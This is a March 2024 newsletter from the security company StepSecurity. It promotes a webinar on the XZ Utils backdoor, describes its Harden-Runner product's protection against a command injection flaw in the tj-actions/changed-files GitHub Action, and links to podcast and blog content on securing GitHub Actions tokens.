March 2024 at StepSecurity

The end of the first quarter has brought about a new wave of serious supply chain attacks and vulnerabilities in the industry. At StepSecurity, we’ve spent the month of March fortifying the defenses of our enterprises and the open-source community from these attacks while also receiving some great feedback for the same.??

Read the newsletter to learn more about what’s been up at StepSecurity in March 2024.??

Webinar Announcement: “Live Analysis of Backdoored XZ Utils Build Process with StepSecurity Harden-Runner"?

The recent XZ Utils Backdoor supply chain attack has sent shockwaves through the industry highlighting the pressing need for solid security measures for CI/CD pipelines.?

In our upcoming webinar, the StepSecurity team will do a live analysis of the backdoored XZ build process with Harden-Runner and observe the injection of the backdoor. The webinar will shed light on the significance of runtime security monitoring during the build process and how it can be pivotal in detecting and mitigating supply chain attacks like the XZ Utils incident.?

You can register for the webinar here: https://www.dhirubhai.net/events/liveanalysisofbackdooredxzutils7184238307239759873/theater/

For more context, you can check out our latest blog post on the analysis which includes an overview of the XZ Utils build process and an analysis of the same with Harden-Runner while emphasizing the importance of runtime security and how it helps in detecting such supply chain attacks.?

We’re updating the blog post as we find new insights, so stay tuned!?

Harden-Runner Defends Against Arbitrary Command Execution in tj-actions/changed-files GitHub Action?

Recently, a security researcher reported an arbitrary command execution vulnerability in the popular tj-actions/changed-files GitHub Action which is used by 12,700 public repositories and many private enterprise repositories! This command injection vulnerability can lead to stolen CI/CD credentials, compromised proprietary source code, and maliciously tampered release builds to inject backdoors.?

Our blog post talks about how StepSecurity Harden-Runner has enabled organizations to fortify their GitHub Actions environment against this vulnerability. Here’s what one of our enterprise customers had to say about it:?

“We got this in pretty much all our repositories recently- https://securitylab.github.com/advisories/GHSL-2023-271_changed-files/. Its used a lot everywhere. Instantly knew StepSecurity was protecting me.”?

StepSecurity GitHub Actions Advisor Featured in DevOps Paradox Podcast?

Thanks to the DevOps Paradox Podcast team for featuring StepSecurity GitHub Actions Advisor! You can check out the full YouTube video here:?https://www.youtube.com/watch?v=wc-30eJsqCE&t=1146s

Here’s what they had to say about the platform:?

“For an enterprise, using a random plugin by a random person is very dangerous. If you’re using GitHub Actions, now you have a way to assess actions and figure out if they’re okay to use or not.”?

?

GITHUB_TOKEN: How It Works and How to Secure Automatic GitHub Action Tokens?

Using GITHUB_TOKEN can be quite tricky and may lead to vulnerabilities if not used securely. Read our blog post on GITHUB_TOKEN to learn how it works, the risks involved while using tokens, and setting the right token permissions for secure usage.??

?

StepSecurity's Latest Usage

Thank you for reading our March ‘24 newsletter. Stay tuned for more and follow us for daily updates.??